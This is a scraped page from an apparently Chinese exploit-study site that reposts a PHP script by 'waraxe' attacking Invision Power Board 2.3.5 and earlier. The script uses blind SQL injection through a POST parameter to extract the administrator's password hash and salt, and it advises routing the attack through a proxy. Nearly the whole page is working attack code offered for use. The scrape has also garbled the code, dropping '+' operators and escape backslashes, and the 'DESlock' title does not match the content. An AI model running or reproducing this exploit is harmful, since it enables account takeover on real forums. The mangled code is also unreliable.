DESlock
DESlock
发布时间:2016-12-21 来源:查字典编辑
摘要:

<?php

error_reporting(E_ALL);

///////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////

// IPB <= 2.3.5 sql injection exploit

// Version 1.0

// written by Janek Vind "waraxe"

// Estonia, Tartu

// http://www.waraxe.us/

// 20. september 2008

// based on DarkFig's advisory

// http://acid-root.new.fr/?0:18

//

// FEATURES:

// 1. Fetching algorithm optimized for speed

// 2. Attack goes through $_POST, so no suspicious logs

// 3. Pretesting saves time if IPB is not vulnerable

//

// More useful tools: http://www.waraxe.us/tools/

// Waraxe forums: http://www.waraxe.us/forums.html

//

// NB! This exploit is meant to be run as php CLI!

// http://www.php.net/features.commandline

///////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////

//=====================================================================

$url = 'http://localhost/ipb.2.3.5/';

$id = 1;// ID of the target user, default value "1" is admin's ID

$prefix = 'ibf_';// IPB table prefix, default is "ibf_"

# Proxy settings

# Be sure to use proxy :)

//$proxy_ip_port = '127.0.0.1:8118';

//$proxy_user_password = 'someuser:somepassword';

$outfile = './ipblog.txt';// Log file

//======================================================================

///////////////////////////////////////////////////////////////////////

// Don't mess below this line, unless you know the stuff ;)

///////////////////////////////////////////////////////////////////////

//=====================================================================

///////////////////////////////////////////////////////////////////////

$cli = php_sapi_name() === 'cli';

//=====================================================================

// Warning, if executed from webserver

//=====================================================================

if(!$cli)

{

if(!isset($_REQUEST['wtf-is-cli']))

{

echo "<html><head><title>Attention!</title></head>n";

echo "<body><br /><br /><center>n";

echo "<h1>Warning!</h1>n";

echo "This exploit is meant to be used as php CLI script!<br />n";

echo "More information:<br />n";

echo "<a href="http://www.google.com/search?hl=en&q=php cli windows" target="_blank">http://www.google.com/search?hl=en&q=php cli windows</a><br />n";

echo "Still, you can try to run it from webserver.<br />n";

echo "Just press the button below and prepare for long waiting<br />n";

echo "And learn to use php CLI next time, please ...<br />n";

echo "<form method="get">n";

echo "<input type="submit" name="wtf-is-cli" value="Let me in, i don't care">n";

echo "</form>n";

echo "</center></body></html>n";

exit;

}

else

{

// Let's try to maximize our chances without CLI

@set_time_limit(0);

}

}

//=====================================================================

xecho("Target: $urln");

xecho("Sql table prefix: $prefixn");

xecho("Testing target URL ... n");

test_target_url();

xecho("Target URL seems to be validn");

xecho("Testing target ID ... n");

test_target_id();

xecho("Target ID seems to be validn"); $hash = get_hash();

$salt = get_salt(); add_line("Target: $url");

add_line("User ID: $id");

add_line("Hash: $hash");

add_line("Salt: $salt");

add_line("------------------------------------------"); xecho("n------------------------------------------n");

xecho("Hash: $hashn");

xecho("Salt: $salt");

xecho("n------------------------------------------n"); xecho("nQuestions and feedback - http://www.waraxe.us/ n");

die("See ya! :) n");

//////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////

function test_target_url()

{

global $url; $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%27 OR 1=1-- ';

$buff = trim(make_post($url, $post, '', $url));

if($buff !== 'found')

{

die('Invalid response, target URL not valid? Exiting ...');

}

}

//////////////////////////////////////////////////////////////////////

function test_target_id()

{

global $url, $prefix, $id; $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';

if(!test_condition($post))

{

die('Invalid response, target ID not valid? Exiting ...');

}

}

///////////////////////////////////////////////////////////////////////

function get_salt()

{

$len = 5;

$out = ''; xecho("Finding salt ...n"); for($i = 1; $i < $len 1; $i )

{

$ch = get_saltchar($i);

xecho("Got pos $i --> $chn");

$out .= "$ch";

xecho("Current salt: $out n");

} xecho("nFinal salt: $outnn"); return $out;

}

///////////////////////////////////////////////////////////////////////

function get_saltchar($pos)

{

global $prefix, $id; $char = '';

$min = 32;

$max = 128;

$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";

$curr = 0; while(1)

{

$area = $max - $min;

if($area < 2 )

{

$post = $pattern . "=$max";

$eq = test_condition($post); if($eq)

{

$char = chr($max);

}

else

{

$char = chr($min);

} break;

} $half = intval(floor($area / 2));

$curr = $min $half; $post = $pattern . '%3e' . $curr; $bigger = test_condition($post); if($bigger)

{

$min = $curr;

}

else

{

$max = $curr;

} xecho("Current test: $curr-$max-$minn");

} return $char;

}

///////////////////////////////////////////////////////////////////////

function get_hash()

{

$len = 32;

$out = ''; xecho("Finding hash ...n"); for($i = 1; $i < $len 1; $i )

{

$ch = get_hashchar($i);

xecho("Got pos $i --> $chn");

$out .= "$ch";

xecho("Current hash: $out n");

} xecho("nFinal hash: $outnn"); return $out;

}

///////////////////////////////////////////////////////////////////////

function get_hashchar($pos)

{

global $prefix, $id; $char = '';

$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))"; // First let's determine, if it's number or letter

$post = $pattern . '%3e57';

$letter = test_condition($post); if($letter)

{

$min = 97;

$max = 102;

xecho("Char to find is [a-f]n");

}

else

{

$min = 48;

$max = 57;

xecho("Char to find is [0-9]n");

} $curr = 0; while(1)

{

$area = $max - $min;

if($area < 2 )

{

$post = $pattern . "=$max";

$eq = test_condition($post); if($eq)

{

$char = chr($max);

}

else

{

$char = chr($min);

} break;

} $half = intval(floor($area / 2));

$curr = $min $half; $post = $pattern . '%3e' . $curr; $bigger = test_condition($post); if($bigger)

{

$min = $curr;

}

else

{

$max = $curr;

} xecho("Current test: $curr-$max-$minn");

} return $char;

}

///////////////////////////////////////////////////////////////////////

function test_condition($p)

{

global $url; $bret = false;

$maxtry = 10;

$try = 1; $pattern = 'act=xmlout&do=check-display-name&name=%%27 OR 1=%%22%%27%%22 %s OR 1=%%22%%27%%22-- ';

$post = sprintf($pattern, $p); while(1)

{

$buff = trim(make_post($url, $post, '', $url)); if($buff === 'found')

{

$bret = true;

break;

}

elseif($buff === 'notfound')

{

break;

}

elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)

{

die("Sql error! Wrong prefix?nExiting ... ");

}

else

{

xecho("test_condition() - try $try - invalid return value ...n");

$try ;

if($try > $maxtry)

{

die("Too many tries - exiting ...n");

}

else

{

xecho("Trying again - try $try ...n");

}

}

} return $bret;

}

///////////////////////////////////////////////////////////////////////

function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)

{

$ch = curl_init();

$timeout = 120;

curl_setopt ($ch, CURLOPT_URL, $url);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);

curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)'); if(!empty($GLOBALS['proxy_ip_port']))

{

curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']); if(!empty($GLOBALS['proxy_user_password']))

{

curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);

}

} if(!empty($cookie))

{

curl_setopt ($ch, CURLOPT_COOKIE, $cookie);

} if(!empty($referer))

{

curl_setopt ($ch, CURLOPT_REFERER, $referer);

} if($headers === TRUE)

{

curl_setopt ($ch, CURLOPT_HEADER, TRUE);

}

else

{

curl_setopt ($ch, CURLOPT_HEADER, FALSE);

} $fc = curl_exec($ch);

curl_close($ch); return $fc;

}

///////////////////////////////////////////////////////////////////////

function add_line($line)

{

global $outfile; $line .= "n";

$fh = fopen($outfile, 'ab');

fwrite($fh, $line);

fclose($fh); }

///////////////////////////////////////////////////////////////////////

function xecho($line)

{

if($GLOBALS['cli'])

{

echo "$line";

}

else

{

$line = nl2br(htmlspecialchars($line));

echo "$line";

}

}

//////////////////////////////////////////////////////////////////////

?>

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新Exploit学习
热门Exploit学习
网络安全子分类